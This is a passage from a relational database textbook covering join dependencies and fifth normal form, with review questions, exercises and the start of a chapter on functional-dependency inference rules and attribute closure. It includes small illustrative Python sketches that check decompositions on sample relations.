where it becomes a trivial MVD. Consider the EMP relation in Figure 15(a). EMP is
not in 4NF because of the nontrivial MVDs Ename →→ Pname and Ename
→→ Dname, and because Ename is not a superkey of EMP. We decompose EMP into
EMP_PROJECTS and EMP_DEPENDENTS, shown in Figure 15(b). Both
EMP_PROJECTS and EMP_DEPENDENTS are in 4NF, because the MVDs Ename
→→ Pname in EMP_PROJECTS and Ename →→ Dname in EMP_DEPENDENTS are
trivial MVDs. No other nontrivial MVDs hold in either EMP_PROJECTS or
EMP_DEPENDENTS. No FDs hold in these relation schemas either.
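As an illustration of this decomposition step, the following Python sketch (illustrative
only; project and natural_join are hypothetical helper names) projects the EMP state of
Figure 15(a) onto (Ename, Pname) and (Ename, Dname) and verifies that joining the two
projections reproduces EMP, that is, that the decomposition is nonadditive.

    def project(state, attrs):
        # Projection with duplicate elimination; tuples kept as sorted (attr, value) pairs.
        return {tuple(sorted((a, t[a]) for a in attrs)) for t in state}

    def natural_join(r1, r2):
        out = set()
        for t1 in r1:
            d1 = dict(t1)
            for t2 in r2:
                d2 = dict(t2)
                if all(d1[a] == d2[a] for a in d1 if a in d2):   # match on common attributes
                    out.add(tuple(sorted({**d1, **d2}.items())))
        return out

    EMP = [{'Ename': 'Smith', 'Pname': 'X', 'Dname': 'John'},
           {'Ename': 'Smith', 'Pname': 'Y', 'Dname': 'Anna'},
           {'Ename': 'Smith', 'Pname': 'X', 'Dname': 'Anna'},
           {'Ename': 'Smith', 'Pname': 'Y', 'Dname': 'John'}]

    EMP_PROJECTS   = project(EMP, ['Ename', 'Pname'])    # for Ename ->-> Pname
    EMP_DEPENDENTS = project(EMP, ['Ename', 'Dname'])    # for Ename ->-> Dname
    rejoined = natural_join(EMP_PROJECTS, EMP_DEPENDENTS)
    print(rejoined == {tuple(sorted(t.items())) for t in EMP})   # True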

7 Join Dependencies
and Fifth Normal Form

In our discussion so far, we have pointed out problematic functional dependencies
and showed how they are eliminated by a process of repeated binary decomposition
during normalization to achieve 1NF, 2NF,
3NF, and BCNF. These binary decompositions must obey the NJB property that we
referenced while discussing the decomposition to achieve BCNF. Achieving 4NF
typically involves eliminating MVDs by repeated binary decompositions as well.
However, in some cases there may be no nonadditive join decomposition of R into
two relation schemas, but there may be a nonadditive join decomposition into more
than two relation schemas. Moreover, there may be no functional dependency in R
that violates any normal form up to BCNF, and there may be no nontrivial MVD
present in R either that violates 4NF. We then resort to another dependency called
the join dependency and, if it is present, carry out a multiway decomposition into fifth
normal form (5NF). It is important to note that such a dependency is a very pecu-
liar semantic constraint that is very difficult to detect in practice; therefore, normal-
ization into 5NF is very rarely done in practice.

17F+ refers to the cover of functional dependencies F, or all dependencies that are implied by F.


Definition. A join dependency (JD), denoted by JD(R1, R2, …, Rn), specified on
relation schema R, specifies a constraint on the states r of R. The constraint
states that every legal state r of R should have a nonadditive join decomposition
into R1, R2, …, Rn. Hence, for every such r we have

∗ (πR1(r), πR2(r), …, πRn(r)) = r

Notice that an MVD is a special case of a JD where n = 2. That is, a JD denoted as
JD(R1, R2) implies an MVD (R1 ∩ R2) →→ (R1 – R2) (or, by symmetry, (R1 ∩ R2)
→→(R2 – R1)). A join dependency JD(R1, R2, …, Rn), specified on relation schema R,
is a trivial JD if one of the relation schemas Ri in JD(R1, R2, …, Rn) is equal to R.
Such a dependency is called trivial because it has the nonadditive join property for
any relation state r of R and thus does not specify any constraint on R. We can now
define fifth normal form, which is also called project-join normal form.

Definition. A relation schema R is in fifth normal form (5NF) (or project-join
normal form (PJNF)) with respect to a set F of functional, multivalued, and
join dependencies if, for every nontrivial join dependency JD(R1, R2, …, Rn) in
F+ (that is, implied by F),18 every Ri is a superkey of R.

For an example of a JD, consider once again the SUPPLY all-key relation in Figure
15(c). Suppose that the following additional constraint always holds: Whenever a
supplier s supplies part p, and a project j uses part p, and the supplier s supplies at
least one part to project j, then supplier s will also be supplying part p to project j.
This constraint can be restated in other ways and specifies a join dependency JD(R1,
R2, R3) among the three projections R1(Sname, Part_name), R2(Sname, Proj_name),
and R3(Part_name, Proj_name) of SUPPLY. If this constraint holds, the tuples below
the dashed line in Figure 15(c) must exist in any legal state of the SUPPLY relation
that also contains the tuples above the dashed line. Figure 15(d) shows how the
SUPPLY relation with the join dependency is decomposed into three relations R1, R2,
and R3 that are each in 5NF. Notice that applying a natural join to any two of these
relations produces spurious tuples, but applying a natural join to all three together
does not. The reader should verify this on the sample relation in Figure 15(c) and its
projections in Figure 15(d). This is because only the JD exists, but no MVDs are
specified. Notice, too, that the JD(R1, R2, R3) is specified on all legal relation states,
not just on the one shown in Figure 15(c).
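The behavior just described can be verified mechanically on the sample state. The sketch
below (illustrative Python only; project and natural_join are hypothetical helpers of the
same style as in the earlier sketch) shows that joining only two of R1, R2, R3 produces
spurious tuples, while the three-way join returns exactly SUPPLY.

    def project(rel, attrs):
        return {tuple((a, dict(t)[a]) for a in sorted(attrs)) for t in rel}

    def natural_join(r1, r2):
        out = set()
        for t1 in r1:
            d1 = dict(t1)
            for t2 in r2:
                d2 = dict(t2)
                if all(d1[a] == d2[a] for a in d1 if a in d2):
                    out.add(tuple(sorted({**d1, **d2}.items())))
        return out

    ATTRS = ('Sname', 'Part_name', 'Proj_name')
    rows = [('Smith', 'Bolt', 'ProjX'), ('Smith', 'Nut', 'ProjY'),
            ('Adamsky', 'Bolt', 'ProjY'), ('Walton', 'Nut', 'ProjZ'),
            ('Adamsky', 'Nail', 'ProjX'),
            # the two tuples below the dashed line, required when JD(R1, R2, R3) holds
            ('Adamsky', 'Bolt', 'ProjX'), ('Smith', 'Bolt', 'ProjY')]
    SUPPLY = {tuple(sorted(zip(ATTRS, r))) for r in rows}

    R1 = project(SUPPLY, ['Sname', 'Part_name'])
    R2 = project(SUPPLY, ['Sname', 'Proj_name'])
    R3 = project(SUPPLY, ['Part_name', 'Proj_name'])

    print(natural_join(R1, R2) == SUPPLY)                    # False: spurious tuples appear
    print(natural_join(natural_join(R1, R2), R3) == SUPPLY)  # True: nonadditive 3-way join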

Discovering JDs in practical databases with hundreds of attributes is next to impos-
sible. It can be done only with a great degree of intuition about the data on the part
of the designer. Therefore, the current practice of database design pays scant atten-
tion to them.

8 Summary
In this chapter we discussed several pitfalls in relational database design using intu-
itive arguments. We identified informally some of the measures for indicating

18Again, F+ refers to the cover of functional dependencies F, or all dependencies that are implied by F.


whether a relation schema is good or bad, and provided informal guidelines for a
good design. These guidelines are based on doing a careful conceptual design in the
ER and EER model and following the mapping procedure correctly to map entities
and relationships into relations. Proper enforcement of these guidelines and the
resulting lack of redundancy will avoid the insertion/deletion/update anomalies and the generation of
spurious data. We recommended limiting NULL values, which cause problems dur-
ing SELECT, JOIN, and aggregation operations. Then we presented some formal
concepts that allow us to do relational design in a top-down fashion by analyzing
relations individually. We defined this process of design by analysis and decomposi-
tion by introducing the process of normalization.

We defined the concept of functional dependency, which is the basic tool for analyz-
ing relational schemas, and discussed some of its properties. Functional dependen-
cies specify semantic constraints among the attributes of a relation schema. Next we
described the normalization process for achieving good designs by testing relations
for undesirable types of problematic functional dependencies. We provided a treat-
ment of successive normalization based on a predefined primary key in each rela-
tion, and then relaxed this requirement and provided more general definitions of
second normal form (2NF) and third normal form (3NF) that take all candidate
keys of a relation into account. We presented examples to illustrate how by using the
general definition of 3NF a given relation may be analyzed and decomposed to
eventually yield a set of relations in 3NF.

We presented Boyce-Codd normal form (BCNF) and discussed how it is a stronger
form of 3NF. We also illustrated how the decomposition of a non-BCNF relation
must be done by considering the nonadditive decomposition requirement. Then we
introduced the fourth normal form based on multivalued dependencies that typi-
cally arise due to mixing independent multivalued attributes into a single relation.
Finally, we introduced the fifth normal form, which is based on join dependency,
and which identifies a peculiar constraint that causes a relation to be decomposed
into several components so that they always yield the original relation back after a
join. In practice, most commercial designs have followed the normal forms up to
BCNF. The need to decompose into 5NF rarely arises in practice, and join dependen-
cies are difficult to detect in most practical situations, making 5NF mainly of theo-
retical value.

Review Questions
1. Discuss attribute semantics as an informal measure of goodness for a rela-

tion schema.


2. Discuss insertion, deletion, and modification anomalies. Why are they con-
sidered bad? Illustrate with examples.

3. Why should NULLs in a relation be avoided as much as possible? Discuss the
problem of spurious tuples and how we may prevent it.

4. State the informal guidelines for relation schema design that we discussed.
Illustrate how violation of these guidelines may be harmful.

5. What is a functional dependency? What are the possible sources of the infor-
mation that defines the functional dependencies that hold among the attrib-
utes of a relation schema?

6. Why can we not infer a functional dependency automatically from a partic-
ular relation state?

7. What does the term unnormalized relation refer to? How did the normal
forms develop historically from first normal form up to Boyce-Codd normal
form?

8. Define first, second, and third normal forms when only primary keys are
considered. How do the general definitions of 2NF and 3NF, which consider
all keys of a relation, differ from those that consider only primary keys?

9. What undesirable dependencies are avoided when a relation is in 2NF?

10. What undesirable dependencies are avoided when a relation is in 3NF?

11. In what way do the generalized definitions of 2NF and 3NF extend the defi-
nitions beyond primary keys?

12. Define Boyce-Codd normal form. How does it differ from 3NF? Why is it
considered a stronger form of 3NF?

13. What is multivalued dependency? When does it arise?

14. Does a relation with two or more columns always have an MVD? Show with
an example.

15. Define fourth normal form. When is it violated? When is it typically
applicable?

16. Define join dependency and fifth normal form.

17. Why is 5NF also called project-join normal form (PJNF)?

18. Why do practical database designs typically aim for BCNF and not aim for
higher normal forms?

Exercises
19. Suppose that we have the following requirements for a university database

that is used to keep track of students’ transcripts:

a. The university keeps track of each student’s name (Sname), student num-
ber (Snum), Social Security number (Ssn), current address (Sc_addr) and


phone (Sc_phone), permanent address (Sp_addr) and phone (Sp_phone),
birth date (Bdate), sex (Sex), class (Class) (‘freshman’, ‘sophomore’, … ,
‘graduate’), major department (Major_code), minor department
(Minor_code) (if any), and degree program (Prog) (‘b.a.’, ‘b.s.’, … , ‘ph.d.’).
Both Ssn and student number have unique values for each student.

b. Each department is described by a name (Dname), department code
(Dcode), office number (Doffice), office phone (Dphone), and college
(Dcollege). Both name and code have unique values for each department.

c. Each course has a course name (Cname), description (Cdesc), course
number (Cnum), number of semester hours (Credit), level (Level), and
offering department (Cdept). The course number is unique for each
course.

d. Each section has an instructor (Iname), semester (Semester), year (Year),
course (Sec_course), and section number (Sec_num). The section number
distinguishes different sections of the same course that are taught during
the same semester/year; its values are 1, 2, 3, …, up to the total number of
sections taught during each semester.

e. A grade record refers to a student (Ssn), a particular section, and a grade
(Grade).

Design a relational database schema for this database application. First show
all the functional dependencies that should hold among the attributes. Then
design relation schemas for the database that are each in 3NF or BCNF.
Specify the key attributes of each relation. Note any unspecified require-
ments, and make appropriate assumptions to render the specification
complete.

20. What update anomalies occur in the EMP_PROJ and EMP_DEPT relations of
Figures 3 and 4?

21. In what normal form is the LOTS relation schema in Figure 12(a) with
respect to the restrictive interpretations of normal form that take only the
primary key into account? Would it be in the same normal form if the gen-
eral definitions of normal form were used?

22. Prove that any relation schema with two attributes is in BCNF.

23. Why do spurious tuples occur in the result of joining the EMP_PROJ1 and
EMP_ LOCS relations in Figure 5 (result shown in Figure 6)?

24. Consider the universal relation R = {A, B, C, D, E, F, G, H, I, J} and the set of
functional dependencies F = { {A, B}→{C}, {A}→{D, E}, {B}→{F}, {F}→{G,
H}, {D}→{I, J} }. What is the key for R? Decompose R into 2NF and then
3NF relations.

25. Repeat Exercise 24 for the following different set of functional dependencies
G = {{A, B}→{C}, {B, D}→{E, F}, {A, D}→{G, H}, {A}→{I}, {H}→{J} }.


A B C TUPLE#
10 b1 c1 1
10 b2 c2 2
11 b4 c1 3
12 b3 c4 4
13 b1 c1 5
14 b3 c4 6

26. Consider the following relation:

a. Given the previous extension (state), which of the following dependencies
may hold in the above relation? If the dependency cannot hold, explain
why by specifying the tuples that cause the violation.

i. A → B, ii. B → C, iii. C → B, iv. B → A, v. C → A
b. Does the above relation have a potential candidate key? If it does, what is
it? If it does not, why not?

27. Consider a relation R(A, B, C, D, E) with the following dependencies:

AB → C, CD → E, DE → B
Is AB a candidate key of this relation? If not, is ABD? Explain your answer.

28. Consider the relation R, which has attributes that hold schedules of courses
and sections at a university; R = {Course_no, Sec_no, Offering_dept,
Credit_hours, Course_level, Instructor_ssn, Semester, Year, Days_hours, Room_no,
No_of_students}. Suppose that the following functional dependencies hold
on R:

{Course_no} → {Offering_dept, Credit_hours, Course_level}
{Course_no, Sec_no, Semester, Year} → {Days_hours, Room_no, No_of_students, Instructor_ssn}
{Room_no, Days_hours, Semester, Year} → {Instructor_ssn, Course_no, Sec_no}

Try to determine which sets of attributes form keys of R. How would you
normalize this relation?

29. Consider the following relations for an order-processing application data-
base at ABC, Inc.

ORDER (O#, Odate, Cust#, Total_amount)
ORDER_ITEM(O#, I#, Qty_ordered, Total_price, Discount%)

Assume that each item has a different discount. The Total_price refers to one
item, Odate is the date on which the order was placed, and the Total_amount is
the amount of the order. If we apply a natural join on the relations
ORDER_ITEM and ORDER in this database, what does the resulting relation
schema look like? What will be its key? Show the FDs in this resulting rela-
tion. Is it in 2NF? Is it in 3NF? Why or why not? (State assumptions, if you
make any.)


30. Consider the following relation:

CAR_SALE(Car#, Date_sold, Salesperson#, Commission%, Discount_amt)

Assume that a car may be sold by multiple salespeople, and hence {Car#,
Salesperson#} is the primary key. Additional dependencies are

Date_sold → Discount_amt and
Salesperson# → Commission%

Based on the given primary key, is this relation in 1NF, 2NF, or 3NF? Why or
why not? How would you successively normalize it completely?

31. Consider the following relation for published books:

BOOK (Book_title, Author_name, Book_type, List_price, Author_affil,
Publisher)

Author_affil refers to the affiliation of author. Suppose the following depen-
dencies exist:

Book_title → Publisher, Book_type
Book_type → List_price
Author_name → Author_affil

a. What normal form is the relation in? Explain your answer.

b. Apply normalization until you cannot decompose the relations further.
State the reasons behind each decomposition.

32. This exercise asks you to convert business statements into dependencies.
Consider the relation DISK_DRIVE (Serial_number, Manufacturer, Model, Batch,
Capacity, Retailer). Each tuple in the relation DISK_DRIVE contains informa-
tion about a disk drive with a unique Serial_number, made by a manufacturer,
with a particular model number, released in a certain batch, which has a cer-
tain storage capacity and is sold by a certain retailer. For example, the tuple
Disk_drive (‘1978619’, ‘WesternDigital’, ‘A2235X’, ‘765234’, 500, ‘CompUSA’)
specifies that WesternDigital made a disk drive with serial number 1978619
and model number A2235X, released in batch 765234; it is 500GB and sold
by CompUSA.

Write each of the following dependencies as an FD:

a. The manufacturer and serial number uniquely identifies the drive.

b. A model number is registered by a manufacturer and therefore can’t be
used by another manufacturer.

c. All disk drives in a particular batch are the same model.

d. All disk drives of a certain model of a particular manufacturer have
exactly the same capacity.

33. Consider the following relation:

R (Doctor#, Patient#, Date, Diagnosis, Treat_code, Charge)


In the above relation, a tuple describes a visit of a patient to a doctor along
with a treatment code and daily charge. Assume that diagnosis is determined
(uniquely) for each patient by a doctor. Assume that each treatment code has
a fixed charge (regardless of patient). Is this relation in 2NF? Justify your
answer and decompose if necessary. Then argue whether further normaliza-
tion to 3NF is necessary, and if so, perform it.

34. Consider the following relation:

CAR_SALE (Car_id, Option_type, Option_listprice, Sale_date,
Option_discountedprice)

This relation refers to options installed in cars (e.g., cruise control) that were
sold at a dealership, and the list and discounted prices of the options.

If Car_id → Sale_date, Option_type → Option_listprice, and {Car_id,
Option_type} → Option_discountedprice, argue using the generalized defini-
tion of the 3NF that this relation is not in 3NF. Then argue from your knowl-
edge of 2NF, why it is not even in 2NF.

35. Consider the relation:

BOOK (Book_Name, Author, Edition, Year)

with the data:

    Book_Name        Author   Edition  Copyright_Year
    DB_fundamentals  Navathe  4        2004
    DB_fundamentals  Elmasri  4        2004
    DB_fundamentals  Elmasri  5        2007
    DB_fundamentals  Navathe  5        2007

a. Based on a common-sense understanding of the above data, what are the
possible candidate keys of this relation?

b. Justify that this relation has the MVD { Book } →→ { Author } | { Edition, Year }.
c. What would be the decomposition of this relation based on the above

MVD? Evaluate each resulting relation for the highest normal form it
possesses.

36. Consider the following relation:

TRIP (Trip_id, Start_date, Cities_visited, Cards_used)

This relation refers to business trips made by company salespeople. Suppose
the TRIP has a single Start_date, but involves many Cities and salespeople may
use multiple credit cards on the trip. Make up a mock-up population of the
table.

a. Discuss what FDs and/or MVDs exist in this relation.

b. Show how you will go about normalizing it.



Laboratory Exercise
Note: The following exercise uses the DBD (Data Base Designer) system that is
described in the laboratory manual. The relational schema R and the set of functional
dependencies F need to be coded as lists. As an example, the R and F of Exercise 24
are coded as:

R = [a, b, c, d, e, f, g, h, i, j]
F = [[[a, b],[c]],

[[a],[d, e]],
[[b],[f]],
[[f],[g, h]],
[[d],[i, j]]]

Since DBD is implemented in Prolog, uppercase terms are reserved for variables
in the language; therefore, lowercase constants are used to code the attributes.
For further details on using the DBD system, please refer to the laboratory
manual.

37. Using the DBD system, verify your answers to the following exercises:

a. 15.24 (3NF only)

b. 15.25

c. 15.27

d. 15.28

Selected Bibliography
Functional dependencies were originally introduced by Codd (1970). The original
definitions of first, second, and third normal form were also defined in Codd
(1972a), where a discussion on update anomalies can be found. Boyce-Codd nor-
mal form was defined in Codd (1974). The alternative definition of third normal
form is given in Ullman (1988), as is the definition of BCNF that we give here.
Ullman (1988), Maier (1983), and Atzeni and De Antonellis (1993) contain many of
the theorems and proofs concerning functional dependencies.


Relational Database Design Algorithms and Further Dependencies

A top-down relational design technique involves designing an ER or EER conceptual schema, then
mapping it to the relational model. Primary keys are assigned to each relation based
on known functional dependencies. In the subsequent process, which may be called
relational design by analysis, initially designed relations from the above proce-
dure—or those inherited from previous files, forms, and other sources—are ana-
lyzed to detect undesirable functional dependencies. These dependencies are
removed by a successive normalization procedure.

In this chapter we use the theory of normal forms and functional, multivalued, and
join dependencies and build upon it while maintaining three different thrusts. First,
we discuss the concept of inferring new functional dependencies from a given set
and discuss notions including cover, minimal cover, and equivalence. Conceptually,
we need to capture the semantics of attributes within a relation completely and

From Chapter 16 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and
Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison-
Wesley. All rights reserved.


succinctly, and the minimal cover allows us to do it. Second, we discuss the desirable
properties of nonadditive (lossless) joins and preservation of functional dependen-
cies. A general algorithm to test for nonadditivity of joins among a set of relations is
presented. Third, we present an approach to relational design by synthesis of func-
tional dependencies. This is a bottom-up approach to design that presupposes that
the known functional dependencies among sets of attributes in the Universe of
Discourse (UoD) have been given as input. We present algorithms to achieve the
desirable normal forms, namely 3NF and BCNF, and achieve one or both of the
desirable properties of nonadditivity of joins and functional dependency preserva-
tion. Although the synthesis approach is theoretically appealing as a formal
approach, it has not been used in practice for large database design projects because
of the difficulty of providing all possible functional dependencies up front before
the design can be attempted. Alternatively, successive decompositions and ongoing
refinements to design become more manageable and may evolve over time. The
final goal of this chapter is to discuss further the multivalued dependency (MVD)
concept and briefly point out other types of dependencies.

In Section 1 we discuss the rules of inference for functional dependencies and use
them to define the concepts of a cover, equivalence, and minimal cover among func-
tional dependencies. In Section 2, first we describe the two desirable properties of
decompositions, namely, the dependency preservation property and the nonaddi-
tive (or lossless) join property, which are both used by the design algorithms to
achieve desirable decompositions. It is important to note that it is insufficient to test
the relation schemas independently of one another for compliance with higher nor-
mal forms like 2NF, 3NF, and BCNF. The resulting relations must collectively satisfy
these two additional properties to qualify as a good design. Section 3 is devoted to
the development of relational design algorithms that start off with one giant rela-
tion schema called the universal relation, which is a hypothetical relation contain-
ing all the attributes. This relation is decomposed (or in other words, the given
functional dependencies are synthesized) into relations that satisfy a certain normal
form like 3NF or BCNF and also meet one or both of the desirable properties.

In Section 5 we discuss the multivalued dependency (MVD) concept further by
applying the notions of inference and equivalence to MVDs. Finally, in Section 6 we
complete the discussion on dependencies among data by introducing inclusion
dependencies and template dependencies. Inclusion dependencies can represent
referential integrity constraints and class/subclass constraints across relations.
Template dependencies are a way of representing any generalized constraint on
attributes. We also describe some situations where a procedure or function is
needed to state and verify a functional dependency among attributes. Then we
briefly discuss domain-key normal form (DKNF), which is considered the most
general normal form. Section 7 summarizes this chapter.

It is possible to skip some or all of Sections 3, 4, and 5 in an introductory database
course.


1 Further Topics in Functional Dependencies:
Inference Rules, Equivalence, and Minimal
Cover

In the chapter “Basics of Functional Dependencies and Normalization for Relational
Databases,” we introduced the concept of functional dependencies (FDs), illustrated
it with some examples, and developed a notation to denote multiple FDs over a sin-
gle relation. We identified and discussed problematic functional dependencies and
showed how they can be eliminated by a proper decomposition of a relation. This
process was described as normalization and we showed how to achieve the first
through third normal forms (1NF through 3NF) given primary keys. We provided
generalized tests for 2NF (Second normal form), 3NF (Third normal form), and
BCNF (Boyce-Codd normal form) given any number of candidate keys in a relation
and showed how to achieve them. Now we return to the study of functional depen-
dencies and show how new dependencies can be inferred from a given set and discuss
the concepts of closure, equivalence, and minimal cover that we will need when we
later consider a synthesis approach to design of relations given a set of FDs.

1.1 Inference Rules for Functional Dependencies
We denote by F the set of functional dependencies that are specified on relation
schema R. Typically, the schema designer specifies the functional dependencies that
are semantically obvious; usually, however, numerous other functional dependencies
hold in all legal relation instances among sets of attributes that can be derived from
and satisfy the dependencies in F. Those other dependencies can be inferred or
deduced from the FDs in F.

In real life, it is impossible to specify all possible functional dependencies for a given
situation. For example, if each department has one manager, so that Dept_no
uniquely determines Mgr_ssn (Dept_no → Mgr_ssn), and a manager has a unique
phone number called Mgr_phone (Mgr_ssn → Mgr_phone), then these two dependen-
cies together imply that Dept_no → Mgr_phone. This is an inferred FD and need not
be explicitly stated in addition to the two given FDs. Therefore, it is useful to define
a concept called closure formally that includes all possible dependencies that can be
inferred from the given set F.

Definition. Formally, the set of all dependencies that include F as well as all
dependencies that can be inferred from F is called the closure of F; it is denoted
by F+.

For example, suppose that we specify the following set F of obvious functional
dependencies on a relation schema:

F = {Ssn → {Ename, Bdate, Address, Dnumber}, Dnumber → {Dname, Dmgr_ssn} }

Some of the additional functional dependencies that we can infer from F are the fol-
lowing:

Ssn → {Dname, Dmgr_ssn}
Ssn → Ssn
Dnumber → Dname


An FD X → Y is inferred from a set of dependencies F specified on R if X → Y
holds in every legal relation state r of R; that is, whenever r satisfies all the depend-
encies in F, X → Y also holds in r. The closure F+ of F is the set of all functional
dependencies that can be inferred from F. To determine a systematic way to infer
dependencies, we must discover a set of inference rules that can be used to infer
new dependencies from a given set of dependencies. We consider some of these
inference rules next. We use the notation F |= X → Y to denote that the functional
dependency X → Y is inferred from the set of functional dependencies F.

In the following discussion, we use an abbreviated notation when discussing func-
tional dependencies. We concatenate attribute variables and drop the commas for
convenience. Hence, the FD {X,Y} → Z is abbreviated to XY → Z, and the FD {X, Y,
Z} → {U, V} is abbreviated to XYZ → UV. The following six rules IR1 through IR6
are well-known inference rules for functional dependencies:

IR1 (reflexive rule)1: If X ⊇ Y, then X → Y.
IR2 (augmentation rule)2: {X → Y} |= XZ → YZ.
IR3 (transitive rule): {X → Y, Y → Z} |= X → Z.
IR4 (decomposition, or projective, rule): {X → YZ} |= X → Y.
IR5 (union, or additive, rule): {X → Y, X → Z} |= X → YZ.
IR6 (pseudotransitive rule): {X → Y, WY → Z} |= WX → Z.

The reflexive rule (IR1) states that a set of attributes always determines itself or any
of its subsets, which is obvious. Because IR1 generates dependencies that are always
true, such dependencies are called trivial. Formally, a functional dependency X → Y
is trivial if X ⊇ Y; otherwise, it is nontrivial. The augmentation rule (IR2) says that
adding the same set of attributes to both the left- and right-hand sides of a depen-
dency results in another valid dependency. According to IR3, functional dependen-
cies are transitive. The decomposition rule (IR4) says that we can remove attributes
from the right-hand side of a dependency; applying this rule repeatedly can decom-
pose the FD X → {A1, A2, …, An} into the set of dependencies {X → A1, X → A2, …,
X → An}. The union rule (IR5) allows us to do the opposite; we can combine a set of
dependencies {X → A1, X → A2, …, X → An} into the single FD X → {A1, A2, …, An}.
The pseudotransitive rule (IR6) allows us to replace a set of attributes Y on the left
hand side of a dependency with another set X that functionally determines Y, and
can be derived from IR2 and IR3 if we augment the first functional dependency
X → Y with W (the augmentation rule) and then apply the transitive rule.

One cautionary note regarding the use of these rules: although X → A and X → B
imply X → AB directly by the union rule stated above, X → A and Y → B imply
XY → AB only indirectly (by augmenting each FD and then applying the union rule).
Also, XY → A does not necessarily imply either X → A or Y → A.

1The reflexive rule can also be stated as X → X; that is, any set of attributes functionally determines itself.
2The augmentation rule can also be stated as X → Y |= XZ → Y; that is, augmenting the left-hand side
attributes of an FD produces another valid FD.
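The second caution is easy to check on a tiny counterexample. The following Python
sketch (illustrative only; the attribute values are made up for this purpose) verifies that
a relation state can satisfy XY → A while violating both X → A and Y → A.

    def fd_holds(state, lhs, rhs):
        # True if the FD lhs -> rhs holds in the given relation state.
        seen = {}
        for t in state:
            key = tuple(t[a] for a in lhs)
            val = tuple(t[a] for a in rhs)
            if seen.setdefault(key, val) != val:
                return False
        return True

    r = [{'X': 'x1', 'Y': 'y1', 'A': 'a1'},
         {'X': 'x1', 'Y': 'y2', 'A': 'a2'},
         {'X': 'x2', 'Y': 'y1', 'A': 'a3'}]
    print(fd_holds(r, ['X', 'Y'], ['A']))   # True:  XY -> A holds
    print(fd_holds(r, ['X'], ['A']))        # False: X -> A does not hold
    print(fd_holds(r, ['Y'], ['A']))        # False: Y -> A does not hold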


Each of the preceding inference rules can be proved from the definition of func-
tional dependency, either by direct proof or by contradiction. A proof by contradic-
tion assumes that the rule does not hold and shows that this is not possible. We now
prove that the first three rules IR1 through IR3 are valid. The second proof is by con-
tradiction.

Proof of IR1. Suppose that X ⊇ Y and that two tuples t1 and t2 exist in some rela-
tion instance r of R such that t1 [X] = t2 [X]. Then t1[Y] = t2[Y] because X ⊇ Y;
hence, X → Y must hold in r.
Proof of IR2 (by contradiction). Assume that X → Y holds in a relation instance
r of R but that XZ → YZ does not hold. Then there must exist two tuples t1 and
t2 in r such that (1) t1 [X] = t2 [X], (2) t1 [Y] = t2 [Y], (3) t1 [XZ] = t2 [XZ], and
(4) t1 [YZ] ≠ t2 [YZ]. This is not possible because from (1) and (3) we deduce
(5) t1 [Z] = t2 [Z], and from (2) and (5) we deduce (6) t1 [YZ] = t2 [YZ], contra-
dicting (4).

Proof of IR3. Assume that (1) X → Y and (2) Y → Z both hold in a relation r.
Then for any two tuples t1 and t2 in r such that t1 [X] = t2 [X], we must have (3)
t1 [Y] = t2 [Y], from assumption (1); hence we must also have (4) t1 [Z] = t2 [Z]
from (3) and assumption (2); thus X → Z must hold in r.

Using similar proof arguments, we can prove the inference rules IR4 to IR6 and any
additional valid inference rules. However, a simpler way to prove that an inference
rule for functional dependencies is valid is to prove it by using inference rules that
have already been shown to be valid. For example, we can prove IR4 through IR6 by
using IR1 through IR3 as follows.

Proof of IR4 (Using IR1 through IR3).

1. X → YZ (given).
2. YZ → Y (using IR1 and knowing that YZ ⊇ Y).
3. X → Y (using IR3 on 1 and 2).

Proof of IR5 (using IR1 through IR3).

1. X →Y (given).
2. X → Z (given).
3. X → XY (using IR2 on 1 by augmenting with X; notice that XX = X).
4. XY → YZ (using IR2 on 2 by augmenting with Y).
5. X → YZ (using IR3 on 3 and 4).

Proof of IR6 (using IR1 through IR3).

1. X → Y (given).
2. WY → Z (given).
3. WX → WY (using IR2 on 1 by augmenting with W).
4. WX → Z (using IR3 on 3 and 2).

It has been shown by Armstrong (1974) that inference rules IR1 through IR3 are
sound and complete. By sound, we mean that given a set of functional dependencies


F specified on a relation schema R, any dependency that we can infer from F by
using IR1 through IR3 holds in every relation state r of R that satisfies the dependen-
cies in F. By complete, we mean that using IR1 through IR3 repeatedly to infer
dependencies until no more dependencies can be inferred results in the complete
set of all possible dependencies that can be inferred from F. In other words, the set of
dependencies F+, which we called the closure of F, can be determined from F by
using only inference rules IR1 through IR3. Inference rules IR1 through IR3 are
known as Armstrong’s inference rules.3

Typically, database designers first specify the set of functional dependencies F that
can easily be determined from the semantics of the attributes of R; then IR1, IR2,
and IR3 are used to infer additional functional dependencies that will also hold on
R. A systematic way to determine these additional functional dependencies is first to
determine each set of attributes X that appears as a left-hand side of some func-
tional dependency in F and then to determine the set of all attributes that are
dependent on X.

Definition. For each such set of attributes X, we determine the set X+ of attrib-
utes that are functionally determined by X based on F; X+ is called the closure
of X under F. Algorithm 1 can be used to calculate X+.

Algorithm 1. Determining X+, the Closure of X under F

Input: A set F of FDs on a relation schema R, and a set of attributes X, which is
a subset of R.

X+ := X;
repeat

oldX+ := X+;
for each functional dependency Y → Z in F do

if X+ ⊇ Y then X+ := X+ ∪ Z;
until (X+ = oldX+);

Algorithm 1 starts by setting X+ to all the attributes in X. By IR1, we know that all
these attributes are functionally dependent on X. Using inference rules IR3 and IR4,
we add attributes to X+, using each functional dependency in F. We keep going
through all the dependencies in F (the repeat loop) until no more attributes are
added to X+ during a complete cycle (of the for loop) through the dependencies in F.
For example, consider the relation schema EMP_PROJ; from the semantics of the
attributes, we specify the following set F of functional dependencies that should
hold on EMP_PROJ:

F = {Ssn → Ename,
Pnumber → {Pname, Plocation},
{Ssn, Pnumber} → Hours}

3They are actually known as Armstrong’s axioms. In the strict mathematical sense, the axioms (given
facts) are the functional dependencies in F, since we assume that they are correct, whereas IR1 through
IR3 are the inference rules for inferring new functional dependencies (new facts).


Using Algorithm 1, we calculate the following closure sets with respect to F:

{Ssn}+ = {Ssn, Ename}
{Pnumber}+ = {Pnumber, Pname, Plocation}
{Ssn, Pnumber}+ = {Ssn, Pnumber, Ename, Pname, Plocation, Hours}

Intuitively, the set of attributes in the right-hand side in each line above represents
all those attributes that are functionally dependent on the set of attributes in the
left-hand side based on the given set F.
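For experimentation, Algorithm 1 translates almost line for line into Python. The sketch
below is illustrative only; the representation of F as a list of (left-hand side,
right-hand side) set pairs is an assumption of this sketch, not a notation used in the text.

    def closure(X, F):
        # Algorithm 1: compute X+ under the set of FDs F.
        Xplus = set(X)
        changed = True
        while changed:
            changed = False
            for lhs, rhs in F:
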